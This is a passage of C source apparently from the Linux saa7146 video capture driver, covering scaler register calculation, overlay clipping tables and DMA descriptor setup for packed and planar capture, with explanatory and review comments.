   (yacl); pairs a coefficient word with the weight sum used to pick the
   attenuation below */
static struct {
	u16 hps_coeff;
	u16 weight_sum;
} hps_v_coeff_tab [] = {
	{0x0100, 2}, {0x0102, 4}, {0x0300, 4}, {0x0106, 8}, {0x0502, 8},
	{0x0708, 8}, {0x0F00, 8}, {0x011E, 16}, {0x110E, 16}, {0x1926, 16},
	{0x3906, 16}, {0x3D42, 16}, {0x7D02, 16}, {0x7F80, 16}, {0xFF00, 16},
	{0x01FE, 32}, {0x01FE, 32}, {0x817E, 32}, {0x817E, 32}, {0xC13E, 32},
	{0xC13E, 32}, {0xE11E, 32}, {0xE11E, 32}, {0xF10E, 32}, {0xF10E, 32},
	{0xF906, 32}, {0xF906, 32}, {0xFD02, 32}, {0xFD02, 32}, {0xFF00, 32},
	{0xFF00, 32}, {0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64},
	{0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64},
	{0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64},
	{0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64}, {0x817E, 64},
	{0x817E, 64}, {0xC13E, 64}, {0xC13E, 64}, {0xE11E, 64}, {0xE11E, 64},
	{0xF10E, 64}, {0xF10E, 64}, {0xF906, 64}, {0xF906, 64}, {0xFD02, 64},
	{0xFD02, 64}, {0xFF00, 64}, {0xFF00, 64}, {0x01FE, 128}
};

/* table of attenuation values for vertical scaling */
static u16 v_attenuation[] = { 2, 4, 8, 16, 32, 64, 128, 256, 0};
/* calculate vertical scale registers */
/*
 * Derive the vertical scaler register values mapping in_y input lines
 * onto out_y output lines for the given field mode.  Vertical zooming
 * (out_y > in_y) is not supported and returns -EINVAL.
 */
static int calculate_v_scale_registers(struct saa7146_dev *dev, enum v4l2_field field,
	int in_y, int out_y, u32* hps_v_scale, u32* hps_v_gain)
{
	int lpi = 0;

	/* vertical scaling */
	u32 yacm = 0, ysci = 0, yacl = 0, ypo = 0, ype = 0;
	/* vertical scale & gain */
	u32 dcgy = 0, cya_cyb = 0;

	/* helper variables */
	u32 v_atten = 0, i = 0;

	/* error, if vertical zooming */
	if ( in_y < out_y ) {
		return -EINVAL;
	}

	/* linear phase interpolation may be used
	   if scaling is between 1 and 1/2 (both fields used)
	   or scaling is between 1/2 and 1/4 (if only one field is used) */
	if (V4L2_FIELD_HAS_BOTH(field)) {
		if( 2*out_y >= in_y) {
			lpi = 1;
		}
	} else if (field == V4L2_FIELD_TOP
		|| field == V4L2_FIELD_ALTERNATE
		|| field == V4L2_FIELD_BOTTOM) {
		if( 4*out_y >= in_y ) {
			lpi = 1;
		}
		out_y *= 2;
	}
	if( 0 != lpi ) {
		/* linear phase interpolation path */
		yacm = 0;
		yacl = 0;
		cya_cyb = 0x00ff;

		/* calculate scaling increment */
		if ( in_y > out_y )
			ysci = ((1024 * in_y) / (out_y + 1)) - 1024;
		else
			ysci = 0;

		dcgy = 0;

		/* calculate ype and ypo */
		ype = ysci / 16;
		ypo = ype + (ysci / 64);

	} else {
		/* accumulation-mode path */
		yacm = 1;

		/* calculate scaling increment */
		ysci = (((10 * 1024 * (in_y - out_y - 1)) / in_y) + 9) / 10;

		/* calculate ype and ypo */
		ypo = ype = ((ysci + 15) / 16);

		/* the sequence length interval (yacl) has to be set according
		   to the prescale value, e.g.	[n   .. 1/2) : 0
						[1/2 .. 1/3) : 1
						[1/3 .. 1/4) : 2
						... */
		if ( ysci < 512) {
			yacl = 0;
		} else {
			yacl = ( ysci / (1024 - ysci) );
		}

		/* get filter coefficients for cya, cyb from table hps_v_coeff_tab */
		cya_cyb = hps_v_coeff_tab[ (yacl < 63 ? yacl : 63 ) ].hps_coeff;

		/* get best match in the table of attenuations for vertical scaling */
		v_atten = hps_v_coeff_tab[ (yacl < 63 ? yacl : 63 ) ].weight_sum;

		for (i = 0; v_attenuation[i] != 0; i++) {
			if (v_attenuation[i] >= v_atten)
				break;
		}

		dcgy = i;
	}

	/* ypo and ype swapped in spec ? */
	*hps_v_scale |= (yacm << 31) | (ysci << 21) | (yacl << 15) | (ypo << 8 ) | (ype << 1);

	*hps_v_gain &= ~(MASK_W0|MASK_B2);
	*hps_v_gain |= (dcgy << 16) | (cya_cyb << 0);

	return 0;
}
/* simple bubble-sort algorithm with duplicate elimination */
/*
 * Sort the first *count entries of @values ascending and squeeze out
 * duplicates, updating *count to the number of unique entries.
 * Returns 0 on success, -EINVAL on bad arguments.
 *
 * Fixes versus the original:
 *  - an empty (or single-element) list returns immediately; previously
 *    *count == 0 was silently rewritten to 1 (cur + 1) even though no
 *    element exists;
 *  - the swap temporary is u32 like the data, not int.
 */
static int sort_and_eliminate(u32* values, int* count)
{
	int low = 0, high = 0, top = 0;
	u32 temp = 0;
	int cur = 0, next = 0;

	/* sanity checks */
	if( (NULL == values) || (NULL == count) || (0 > *count) ) {
		return -EINVAL;
	}

	/* nothing to sort or deduplicate */
	if( *count < 2 ) {
		return 0;
	}

	/* bubble sort the first @count items of the array @values */
	for( top = *count; top > 0; top--) {
		for( low = 0, high = 1; high < top; low++, high++) {
			if( values[low] > values[high] ) {
				temp = values[low];
				values[low] = values[high];
				values[high] = temp;
			}
		}
	}

	/* remove duplicate items */
	for( cur = 0, next = 1; next < *count; next++) {
		if( values[cur] != values[next])
			values[++cur] = values[next];
	}

	*count = cur + 1;

	return 0;
}
/*
 * Build the clipping table in DMA memory for rectangle-mode clipping and
 * prepare the video-dma2 descriptor that feeds it to the chip.  The clip
 * windows are normalized, their edges collected into sorted line/pixel
 * lists, and each table entry records which clip windows cover it.
 */
static void calculate_clipping_registers_rect(struct saa7146_dev *dev, struct saa7146_fh *fh,
	struct saa7146_video_dma *vdma2, u32* clip_format, u32* arbtr_ctrl, enum v4l2_field field)
{
	struct saa7146_vv *vv = dev->vv_data;
	__le32 *clipping = vv->d_clipping.cpu_addr;

	int width = vv->ov.win.w.width;
	int height =  vv->ov.win.w.height;
	int clipcount = vv->ov.nclips;

	u32 line_list[32];
	u32 pixel_list[32];
	int numdwords = 0;

	int i = 0, j = 0;
	int cnt_line = 0, cnt_pixel = 0;

	int x[32], y[32], w[32], h[32];

	/* clear out memory */
	memset(&line_list[0],  0x00, sizeof(u32)*32);
	memset(&pixel_list[0], 0x00, sizeof(u32)*32);
	memset(clipping,  0x00, SAA7146_CLIPPING_MEM);

	/* fill the line and pixel-lists */
	for(i = 0; i < clipcount; i++) {
		int l = 0, r = 0, t = 0, b = 0;

		x[i] = vv->ov.clips[i].c.left;
		y[i] = vv->ov.clips[i].c.top;
		w[i] = vv->ov.clips[i].c.width;
		h[i] = vv->ov.clips[i].c.height;

		/* normalize negative width/height/origin */
		if( w[i] < 0) {
			x[i] += w[i]; w[i] = -w[i];
		}
		if( h[i] < 0) {
			y[i] += h[i]; h[i] = -h[i];
		}
		if( x[i] < 0) {
			w[i] += x[i]; x[i] = 0;
		}
		if( y[i] < 0) {
			h[i] += y[i]; y[i] = 0;
		}
		/* mirror the window vertically if the overlay is flipped */
		if( 0 != vv->vflip ) {
			y[i] = height - y[i] - h[i];
		}

		l = x[i];
		r = x[i]+w[i];
		t = y[i];
		b = y[i]+h[i];

		/* insert left/right coordinates */
		pixel_list[ 2*i   ] = min_t(int, l, width);
		pixel_list[(2*i)+1] = min_t(int, r, width);
		/* insert top/bottom coordinates */
		line_list[ 2*i   ] = min_t(int, t, height);
		line_list[(2*i)+1] = min_t(int, b, height);
	}

	/* sort and eliminate lists */
	cnt_line = cnt_pixel = 2*clipcount;
	sort_and_eliminate( &pixel_list[0], &cnt_pixel );
	sort_and_eliminate( &line_list[0], &cnt_line );

	/* calculate the number of used u32s */
	numdwords = max_t(int, (cnt_line+1), (cnt_pixel+1))*2;
	numdwords = max_t(int, 4, numdwords);
	numdwords = min_t(int, 64, numdwords);

	/* fill up cliptable */
	for(i = 0; i < cnt_pixel; i++) {
		clipping[2*i] |= cpu_to_le32(pixel_list[i] << 16);
	}
	for(i = 0; i < cnt_line; i++) {
		clipping[(2*i)+1] |= cpu_to_le32(line_list[i] << 16);
	}

	/* fill up cliptable with the display infos */
	for(j = 0; j < clipcount; j++) {

		for(i = 0; i < cnt_pixel; i++) {

			if( x[j] < 0)
				x[j] = 0;

			if( pixel_list[i] < (x[j] + w[j])) {

				if ( pixel_list[i] >= x[j] ) {
					clipping[2*i] |= cpu_to_le32(1 << j);
				}
			}
		}
		for(i = 0; i < cnt_line; i++) {

			if( y[j] < 0)
				y[j] = 0;

			if( line_list[i] < (y[j] + h[j]) ) {

				if( line_list[i] >= y[j] ) {
					clipping[(2*i)+1] |= cpu_to_le32(1 << j);
				}
			}
		}
	}

	/* adjust arbitration control register */
	*arbtr_ctrl &= 0xffff00ff;
	*arbtr_ctrl |= 0x00001c00;

	/* point video dma2 at the clipping table */
	vdma2->base_even	= vv->d_clipping.dma_handle;
	vdma2->base_odd		= vv->d_clipping.dma_handle;
	vdma2->prot_addr	= vv->d_clipping.dma_handle+((sizeof(u32))*(numdwords));
	vdma2->base_page	= 0x04;
	vdma2->pitch		= 0x00;
	vdma2->num_line_byte	= (0 << 16 | (sizeof(u32))*(numdwords-1) );

	/* set clipping-mode. this depends on the field(s) used */
	*clip_format &= 0xfffffff7;
	if (V4L2_FIELD_HAS_BOTH(field)) {
		*clip_format |= 0x00000008;
	} else {
		*clip_format |= 0x00000000;
	}
}
/* Turn clipping off: clear the clip-mode bits of the clip-format
 * register, latch the change and stop video DMA channel 2. */
static void saa7146_disable_clipping(struct saa7146_dev *dev)
{
	u32 fmt;

	/* mask out the relevant bits (= lower word) of the current format */
	fmt = saa7146_read(dev, CLIP_FORMAT_CTRL) & MASK_W1;

	/* write back and trigger the shadow-register upload */
	saa7146_write(dev, CLIP_FORMAT_CTRL, fmt);
	saa7146_write(dev, MC2, (MASK_05 | MASK_21));

	/* disable video dma2 */
	saa7146_write(dev, MC1, MASK_21);
}
/*
 * Program rectangle-mode clipping for the current overlay window: build
 * the clip table, configure video dma2 to feed it, and enable clipping.
 * With no clip windows, clipping is simply disabled.
 */
static void saa7146_set_clipping_rect(struct saa7146_fh *fh)
{
	struct saa7146_dev *dev = fh->dev;
	struct saa7146_vv *vv = dev->vv_data;
	enum v4l2_field field = vv->ov.win.field;
	struct	saa7146_video_dma vdma2;
	u32 clip_format;
	u32 arbtr_ctrl;

	/* check clipcount, disable clipping if clipcount == 0*/
	if (vv->ov.nclips == 0) {
		saa7146_disable_clipping(dev);
		return;
	}

	clip_format = saa7146_read(dev, CLIP_FORMAT_CTRL);
	arbtr_ctrl = saa7146_read(dev, PCI_BT_V1);

	calculate_clipping_registers_rect(dev, fh, &vdma2, &clip_format, &arbtr_ctrl, field);

	/* set clipping format */
	clip_format &= 0xffff0008;
	clip_format |= (SAA7146_CLIPPING_RECT << 4);

	/* prepare video dma2 */
	saa7146_write(dev, BASE_EVEN2, vdma2.base_even);
	saa7146_write(dev, BASE_ODD2, vdma2.base_odd);
	saa7146_write(dev, PROT_ADDR2, vdma2.prot_addr);
	saa7146_write(dev, BASE_PAGE2, vdma2.base_page);
	saa7146_write(dev, PITCH2, vdma2.pitch);
	saa7146_write(dev, NUM_LINE_BYTE2, vdma2.num_line_byte);

	/* prepare the rest */
	saa7146_write(dev, CLIP_FORMAT_CTRL,clip_format);
	saa7146_write(dev, PCI_BT_V1, arbtr_ctrl);

	/* upload clip_control-register, clipping-registers, enable video dma2 */
	saa7146_write(dev, MC2, (MASK_05 | MASK_21 | MASK_03 | MASK_19));
	saa7146_write(dev, MC1, (MASK_05 | MASK_21));
}
/*
 * Program the complete HPS scaler chain (vertical scale/gain, horizontal
 * pre-/fine-scale, offsets, source and sync) for the given output window
 * size and field mode, then latch the shadow registers.
 */
static void saa7146_set_window(struct saa7146_dev *dev, int width, int height, enum v4l2_field field)
{
	struct saa7146_vv *vv = dev->vv_data;

	int source = vv->current_hps_source;
	int sync = vv->current_hps_sync;

	u32 hps_v_scale = 0, hps_v_gain  = 0, hps_ctrl = 0, hps_h_prescale = 0, hps_h_scale = 0;

	/* set vertical scale */
	hps_v_scale = 0; /* all bits get set by the function-call */
	hps_v_gain  = 0; /* fixme: saa7146_read(dev, HPS_V_GAIN);*/
	calculate_v_scale_registers(dev, field, vv->standard->v_field*2, height, &hps_v_scale, &hps_v_gain);

	/* set horizontal scale */
	hps_ctrl	= 0;
	hps_h_prescale	= 0; /* all bits get set in the function */
	hps_h_scale	= 0;
	calculate_h_scale_registers(dev, vv->standard->h_pixels, width, vv->hflip, &hps_ctrl, &hps_v_gain, &hps_h_prescale, &hps_h_scale);

	/* set hyo and hxo */
	calculate_hxo_and_hyo(vv, &hps_h_scale, &hps_ctrl);
	calculate_hps_source_and_sync(dev, source, sync, &hps_ctrl);

	/* write out new register contents */
	saa7146_write(dev, HPS_V_SCALE,	hps_v_scale);
	saa7146_write(dev, HPS_V_GAIN,	hps_v_gain);
	saa7146_write(dev, HPS_CTRL,	hps_ctrl);
	saa7146_write(dev, HPS_H_PRESCALE,hps_h_prescale);
	saa7146_write(dev, HPS_H_SCALE,	hps_h_scale);

	/* upload shadow-ram registers */
	saa7146_write(dev, MC2, (MASK_05 | MASK_06 | MASK_21 | MASK_22) );
}
/* calculate the new memory offsets for a desired position */
/*
 * Compute the video-dma1 base/protection addresses that place the
 * overlay at (w_x, w_y) in the framebuffer, honouring vertical flip and
 * the requested field mode, and program them into the chip.
 */
static void saa7146_set_position(struct saa7146_dev *dev, int w_x, int w_y, int w_height, enum v4l2_field field, u32 pixelformat)
{
	struct saa7146_vv *vv = dev->vv_data;
	struct saa7146_format *sfmt = saa7146_format_by_fourcc(dev, pixelformat);

	int b_depth = vv->ov_fmt->depth;
	int b_bpl = vv->ov_fb.fmt.bytesperline;
	/* The unsigned long cast is to remove a 64-bit compile warning since
	   it looks like a 64-bit address is cast to a 32-bit value, even
	   though the base pointer is really a 32-bit physical address that
	   goes into a 32-bit DMA register.
	   FIXME: might not work on some 64-bit platforms, but see the FIXME
	   in struct v4l2_framebuffer (videodev2.h) for that.
	 */
	u32 base = (u32)(unsigned long)vv->ov_fb.base;

	struct	saa7146_video_dma vdma1;

	/* calculate memory offsets for picture, look if we shall top-down-flip */
	vdma1.pitch	= 2*b_bpl;
	if ( 0 == vv->vflip ) {
		vdma1.base_even = base + (w_y * (vdma1.pitch/2)) + (w_x * (b_depth / 8));
		vdma1.base_odd = vdma1.base_even + (vdma1.pitch / 2);
		vdma1.prot_addr = vdma1.base_even + (w_height * (vdma1.pitch / 2));
	}
	else {
		/* flipped: start at the bottom line and walk upwards (negative pitch) */
		vdma1.base_even = base + ((w_y+w_height) * (vdma1.pitch/2)) + (w_x * (b_depth / 8));
		vdma1.base_odd = vdma1.base_even - (vdma1.pitch / 2);
		vdma1.prot_addr = vdma1.base_odd - (w_height * (vdma1.pitch / 2));
	}

	if (V4L2_FIELD_HAS_BOTH(field)) {
	} else if (field == V4L2_FIELD_ALTERNATE) {
		/* fixme */
		vdma1.base_odd = vdma1.prot_addr;
		vdma1.pitch /= 2;
	} else if (field == V4L2_FIELD_TOP) {
		vdma1.base_odd = vdma1.prot_addr;
		vdma1.pitch /= 2;
	} else if (field == V4L2_FIELD_BOTTOM) {
		vdma1.base_odd = vdma1.base_even;
		vdma1.base_even = vdma1.prot_addr;
		vdma1.pitch /= 2;
	}

	if ( 0 != vv->vflip ) {
		vdma1.pitch *= -1;
	}

	vdma1.base_page = sfmt->swap;
	vdma1.num_line_byte = (vv->standard->v_field<<16)+vv->standard->h_pixels;

	saa7146_write_out_dma(dev, 1, &vdma1);
}
/* Program the overlay output palette into the clip-format register. */
static void saa7146_set_output_format(struct saa7146_dev *dev, unsigned long palette)
{
	u32 fmt;

	/* read-modify-write the clip format with the new palette bits */
	fmt = saa7146_read(dev, CLIP_FORMAT_CTRL);
	calculate_output_format_register(dev, palette, &fmt);
	saa7146_write(dev, CLIP_FORMAT_CTRL, fmt);

	/* latch the shadow registers */
	saa7146_write(dev, MC2, (MASK_05 | MASK_21));
}
/* select input-source */
/*
 * Public helper: select the HPS input source and sync for the device,
 * program the hardware and remember the selection in the vv state.
 */
void saa7146_set_hps_source_and_sync(struct saa7146_dev *dev, int source, int sync)
{
	struct saa7146_vv *vv = dev->vv_data;
	u32 hps_ctrl = 0;

	/* read old state */
	hps_ctrl = saa7146_read(dev, HPS_CTRL);

	hps_ctrl &= ~( MASK_31 | MASK_30 | MASK_28 );
	hps_ctrl |= (source << 30) | (sync << 28);

	/* write back & upload register */
	saa7146_write(dev, HPS_CTRL, hps_ctrl);
	saa7146_write(dev, MC2, (MASK_05 | MASK_21));

	/* cache the active selection for later window programming */
	vv->current_hps_source = source;
	vv->current_hps_sync = sync;
}
EXPORT_SYMBOL_GPL(saa7146_set_hps_source_and_sync);
/*
 * Enable the video overlay: program scaler window, framebuffer position,
 * output format and clipping, then start video dma1.  Always returns 0.
 */
int saa7146_enable_overlay(struct saa7146_fh *fh)
{
	struct saa7146_dev *dev = fh->dev;
	struct saa7146_vv *vv = dev->vv_data;

	saa7146_set_window(dev, vv->ov.win.w.width, vv->ov.win.w.height, vv->ov.win.field);
	saa7146_set_position(dev, vv->ov.win.w.left, vv->ov.win.w.top, vv->ov.win.w.height, vv->ov.win.field, vv->ov_fmt->pixelformat);
	saa7146_set_output_format(dev, vv->ov_fmt->trans);
	saa7146_set_clipping_rect(fh);

	/* enable video dma1 */
	saa7146_write(dev, MC1, (MASK_06 | MASK_22));
	return 0;
}
/* Stop the overlay: tear down clipping first, then switch off video dma1. */
void saa7146_disable_overlay(struct saa7146_fh *fh)
{
	/* disabling clipping also stops video dma2 ... */
	saa7146_disable_clipping(fh->dev);
	/* ... then video dma1 is switched off */
	saa7146_write(fh->dev, MC1, MASK_22);
}
/*
 * Write a video DMA descriptor (channels 1..3) into the chip's register
 * block for that channel and trigger the shadow-register upload.
 * Out-of-range channel numbers are silently ignored.
 */
void saa7146_write_out_dma(struct saa7146_dev* dev, int which, struct saa7146_video_dma* vdma)
{
	int where = 0;

	if( which < 1 || which > 3) {
		return;
	}

	/* calculate starting address: each channel owns a 0x18-byte block */
	where  = (which-1)*0x18;

	saa7146_write(dev, where,	vdma->base_odd);
	saa7146_write(dev, where+0x04,	vdma->base_even);
	saa7146_write(dev, where+0x08,	vdma->prot_addr);
	saa7146_write(dev, where+0x0c,	vdma->pitch);
	saa7146_write(dev, where+0x10,	vdma->base_page);
	saa7146_write(dev, where+0x14,	vdma->num_line_byte);

	/* upload */
	saa7146_write(dev, MC2, (MASK_02<<(which-1))|(MASK_18<<(which-1)));
/*
	printk("vdma%d.base_even:     0x%08x\n", which,vdma->base_even);
	printk("vdma%d.base_odd:      0x%08x\n", which,vdma->base_odd);
	printk("vdma%d.prot_addr:     0x%08x\n", which,vdma->prot_addr);
	printk("vdma%d.base_page:     0x%08x\n", which,vdma->base_page);
	printk("vdma%d.pitch:         0x%08x\n", which,vdma->pitch);
	printk("vdma%d.num_line_byte: 0x%08x\n", which,vdma->num_line_byte);
*/
}
/*
 * Set up video dma1 for packed-pixel capture into the buffer @buf,
 * deriving pitch and base addresses from the buffer format, vertical
 * flip and field mode.  Always returns 0.
 */
static int calculate_video_dma_grab_packed(struct saa7146_dev* dev, struct saa7146_buf *buf)
{
	struct saa7146_vv *vv = dev->vv_data;
	struct saa7146_video_dma vdma1;

	struct saa7146_format *sfmt = saa7146_format_by_fourcc(dev,buf->fmt->pixelformat);

	int width = buf->fmt->width;
	int height = buf->fmt->height;
	int bytesperline = buf->fmt->bytesperline;
	enum v4l2_field field = buf->fmt->field;

	int depth = sfmt->depth;

	DEB_CAP("[size=%dx%d,fields=%s]\n",
		width, height, v4l2_field_names[field]);

	/* explicit bytesperline wins over the width-derived pitch */
	if( bytesperline != 0) {
		vdma1.pitch = bytesperline*2;
	} else {
		vdma1.pitch = (width*depth*2)/8;
	}
	vdma1.num_line_byte	= ((vv->standard->v_field<<16) + vv->standard->h_pixels);
	vdma1.base_page		= buf->pt[0].dma | ME1 | sfmt->swap;

	if( 0 != vv->vflip ) {
		/* flipped: walk the buffer bottom-up */
		vdma1.prot_addr	= buf->pt[0].offset;
		vdma1.base_even	= buf->pt[0].offset+(vdma1.pitch/2)*height;
		vdma1.base_odd	= vdma1.base_even - (vdma1.pitch/2);
	} else {
		vdma1.base_even	= buf->pt[0].offset;
		vdma1.base_odd	= vdma1.base_even + (vdma1.pitch/2);
		vdma1.prot_addr	= buf->pt[0].offset+(vdma1.pitch/2)*height;
	}

	if (V4L2_FIELD_HAS_BOTH(field)) {
	} else if (field == V4L2_FIELD_ALTERNATE) {
		/* fixme */
		if ( vv->last_field == V4L2_FIELD_TOP ) {
			vdma1.base_odd	= vdma1.prot_addr;
			vdma1.pitch /= 2;
		} else if ( vv->last_field == V4L2_FIELD_BOTTOM ) {
			vdma1.base_odd	= vdma1.base_even;
			vdma1.base_even = vdma1.prot_addr;
			vdma1.pitch /= 2;
		}
	} else if (field == V4L2_FIELD_TOP) {
		vdma1.base_odd	= vdma1.prot_addr;
		vdma1.pitch /= 2;
	} else if (field == V4L2_FIELD_BOTTOM) {
		vdma1.base_odd	= vdma1.base_even;
		vdma1.base_even = vdma1.prot_addr;
		vdma1.pitch /= 2;
	}

	if( 0 != vv->vflip ) {
		vdma1.pitch *= -1;
	}

	saa7146_write_out_dma(dev, 1, &vdma1);
	return 0;
}
/*
 * Fill the chroma DMA descriptors (engines 2 and 3) for 4:2:2 planar
 * formats: each chroma plane has a full-width pitch.  Plane 1 feeds
 * vdma2, plane 2 feeds vdma3.  Always returns 0.
 */
static int calc_planar_422(struct saa7146_vv *vv, struct saa7146_buf *buf, struct saa7146_video_dma *vdma2, struct saa7146_video_dma *vdma3)
{
	int h = buf->fmt->height;
	int w = buf->fmt->width;

	vdma2->pitch = w;
	vdma3->pitch = w;

	/* fixme: look at bytesperline! */
	if (vv->vflip != 0) {
		/* flipped: bases at plane end, protection address at its start */
		vdma2->prot_addr = buf->pt[1].offset;
		vdma2->base_even = buf->pt[1].offset + (vdma2->pitch / 2) * h;
		vdma2->base_odd  = vdma2->base_even - (vdma2->pitch / 2);

		vdma3->prot_addr = buf->pt[2].offset;
		vdma3->base_even = buf->pt[2].offset + (vdma3->pitch / 2) * h;
		vdma3->base_odd  = vdma3->base_even - (vdma3->pitch / 2);
	} else {
		vdma2->base_even = buf->pt[1].offset;
		vdma2->base_odd  = vdma2->base_even + (vdma2->pitch / 2);
		vdma2->prot_addr = buf->pt[1].offset + (vdma2->pitch / 2) * h;

		vdma3->base_even = buf->pt[2].offset;
		vdma3->base_odd  = vdma3->base_even + (vdma3->pitch / 2);
		vdma3->prot_addr = buf->pt[2].offset + (vdma3->pitch / 2) * h;
	}
	return 0;
}
/*
 * Fill the chroma DMA descriptors (engines 2 and 3) for 4:2:0 planar
 * formats: chroma planes are half-width, so the pitch is width/2.
 * Always returns 0.
 */
static int calc_planar_420(struct saa7146_vv *vv, struct saa7146_buf *buf, struct saa7146_video_dma *vdma2, struct saa7146_video_dma *vdma3)
{
	int height = buf->fmt->height;
	int width = buf->fmt->width;

	vdma2->pitch = width/2;
	vdma3->pitch = width/2;

	if( 0 != vv->vflip ) {
		/* NOTE(review): this branch feeds vdma2 from pt[2] and vdma3
		 * from pt[1] -- the reverse of the else branch and of
		 * calc_planar_422() -- and steps base_odd by pitch/2 where
		 * the else branch uses a full pitch.  Possibly intentional
		 * for flipped 4:2:0, possibly a latent bug; confirm against
		 * the saa7146 datasheet before changing. */
		vdma2->prot_addr = buf->pt[2].offset;
		vdma2->base_even = ((vdma2->pitch/2)*height)+buf->pt[2].offset;
		vdma2->base_odd = vdma2->base_even - (vdma2->pitch/2);

		vdma3->prot_addr = buf->pt[1].offset;
		vdma3->base_even = ((vdma3->pitch/2)*height)+buf->pt[1].offset;
		vdma3->base_odd = vdma3->base_even - (vdma3->pitch/2);
	} else {
		/* odd lines sit one full (half-width) pitch after the even
		 * lines because chroma is also vertically subsampled */
		vdma3->base_even = buf->pt[2].offset;
		vdma3->base_odd = vdma3->base_even + (vdma3->pitch);
		vdma3->prot_addr = (vdma3->pitch/2)*height+buf->pt[2].offset;

		vdma2->base_even = buf->pt[1].offset;
		vdma2->base_odd = vdma2->base_even + (vdma2->pitch);
		vdma2->prot_addr = (vdma2->pitch/2)*height+buf->pt[1].offset;
	}
	return 0;
}
/*
 * Build and program the descriptors for a planar capture: luma on
 * engine 1 here, chroma on engines 2/3 via calc_planar_420/422 depending
 * on the format depth (12 = 4:2:0, 16 = 4:2:2).  Returns 0 on success,
 * -1 for an unsupported depth.
 */
static int calculate_video_dma_grab_planar(struct saa7146_dev* dev, struct saa7146_buf *buf)
{
	struct saa7146_vv *vv = dev->vv_data;
	struct saa7146_video_dma vdma1;
	struct saa7146_video_dma vdma2;
	struct saa7146_video_dma vdma3;
	struct saa7146_format *sfmt = saa7146_format_by_fourcc(dev,buf->fmt->pixelformat);
	int width = buf->fmt->width;
	int height = buf->fmt->height;
	enum v4l2_field field = buf->fmt->field;

	/* all three pagetables must be mapped for planar capture */
	BUG_ON(0 == buf->pt[0].dma);
	BUG_ON(0 == buf->pt[1].dma);
	BUG_ON(0 == buf->pt[2].dma);

	DEB_CAP("[size=%dx%d,fields=%s]\n",
		width, height, v4l2_field_names[field]);

	/* fixme: look at bytesperline! */

	/* fixme: what happens for user space buffers here?. The offsets are
	   most likely wrong, this version here only works for page-aligned
	   buffers, modifications to the pagetable-functions are necessary...*/

	/* luma: one byte per pixel, pitch spans two interleaved lines */
	vdma1.pitch = width*2;
	vdma1.num_line_byte = ((vv->standard->v_field<<16) + vv->standard->h_pixels);
	vdma1.base_page = buf->pt[0].dma | ME1;

	if( 0 != vv->vflip ) {
		vdma1.prot_addr = buf->pt[0].offset;
		vdma1.base_even = ((vdma1.pitch/2)*height)+buf->pt[0].offset;
		vdma1.base_odd = vdma1.base_even - (vdma1.pitch/2);
	} else {
		vdma1.base_even = buf->pt[0].offset;
		vdma1.base_odd = vdma1.base_even + (vdma1.pitch/2);
		vdma1.prot_addr = (vdma1.pitch/2)*height+buf->pt[0].offset;
	}

	vdma2.num_line_byte = 0; /* unused */
	vdma2.base_page = buf->pt[1].dma | ME1;

	vdma3.num_line_byte = 0; /* unused */
	vdma3.base_page = buf->pt[2].dma | ME1;

	/* chroma layout depends on the format's bits-per-pixel */
	switch( sfmt->depth ) {
	case 12: {
		calc_planar_420(vv,buf,&vdma2,&vdma3);
		break;
	}
	case 16: {
		calc_planar_422(vv,buf,&vdma2,&vdma3);
		break;
	}
	default: {
		return -1;
	}
	}

	if (V4L2_FIELD_HAS_BOTH(field)) {
		/* interlaced: defaults above already cover both fields */
	} else if (field == V4L2_FIELD_ALTERNATE) {
		/* fixme */
		vdma1.base_odd = vdma1.prot_addr;
		vdma1.pitch /= 2;
		vdma2.base_odd = vdma2.prot_addr;
		vdma2.pitch /= 2;
		vdma3.base_odd = vdma3.prot_addr;
		vdma3.pitch /= 2;
	} else if (field == V4L2_FIELD_TOP) {
		vdma1.base_odd = vdma1.prot_addr;
		vdma1.pitch /= 2;
		vdma2.base_odd = vdma2.prot_addr;
		vdma2.pitch /= 2;
		vdma3.base_odd = vdma3.prot_addr;
		vdma3.pitch /= 2;
	} else if (field == V4L2_FIELD_BOTTOM) {
		vdma1.base_odd = vdma1.base_even;
		vdma1.base_even = vdma1.prot_addr;
		vdma1.pitch /= 2;
		vdma2.base_odd = vdma2.base_even;
		vdma2.base_even = vdma2.prot_addr;
		vdma2.pitch /= 2;
		vdma3.base_odd = vdma3.base_even;
		vdma3.base_even = vdma3.prot_addr;
		vdma3.pitch /= 2;
	}

	if( 0 != vv->vflip ) {
		/* negative pitch: engines walk the planes backwards */
		vdma1.pitch *= -1;
		vdma2.pitch *= -1;
		vdma3.pitch *= -1;
	}

	saa7146_write_out_dma(dev, 1, &vdma1);
	/* byte-swapped formats exchange the two chroma engines */
	if( (sfmt->flags & FORMAT_BYTE_SWAP) != 0 ) {
		saa7146_write_out_dma(dev, 3, &vdma2);
		saa7146_write_out_dma(dev, 2, &vdma3);
	} else {
		saa7146_write_out_dma(dev, 2, &vdma2);
		saa7146_write_out_dma(dev, 3, &vdma3);
	}
	return 0;
}
/*
 * Emit the RPS0 microprogram that drives one capture cycle: wait for the
 * field toggle, raise the "streaming" flag (rps register 0), switch the
 * video DMA engine(s) on, wait for the frame to complete, switch them
 * off again, then raise an interrupt and stop.  @planar adds DMA2/DMA3
 * handling for planar formats.  Instruction order is the program -- do
 * not reorder.
 */
static void program_capture_engine(struct saa7146_dev *dev, int planar)
{
	struct saa7146_vv *vv = dev->vv_data;
	int count = 0;

	/* select the field-id signals of whichever sync port is active */
	unsigned long e_wait = vv->current_hps_sync == SAA7146_HPS_SYNC_PORT_A ? CMD_E_FID_A : CMD_E_FID_B;
	unsigned long o_wait = vv->current_hps_sync == SAA7146_HPS_SYNC_PORT_A ? CMD_O_FID_A : CMD_O_FID_B;

	/* wait for o_fid_a/b / e_fid_a/b toggle only if rps register 0 is not set*/
	WRITE_RPS0(CMD_PAUSE | CMD_OAN | CMD_SIG0 | o_wait);
	WRITE_RPS0(CMD_PAUSE | CMD_OAN | CMD_SIG0 | e_wait);

	/* set rps register 0 */
	WRITE_RPS0(CMD_WR_REG | (1 << 8) | (MC2/4));
	WRITE_RPS0(MASK_27 | MASK_11);

	/* turn on video-dma1 */
	WRITE_RPS0(CMD_WR_REG_MASK | (MC1/4));
	WRITE_RPS0(MASK_06 | MASK_22);	/* => mask */
	WRITE_RPS0(MASK_06 | MASK_22);	/* => values */

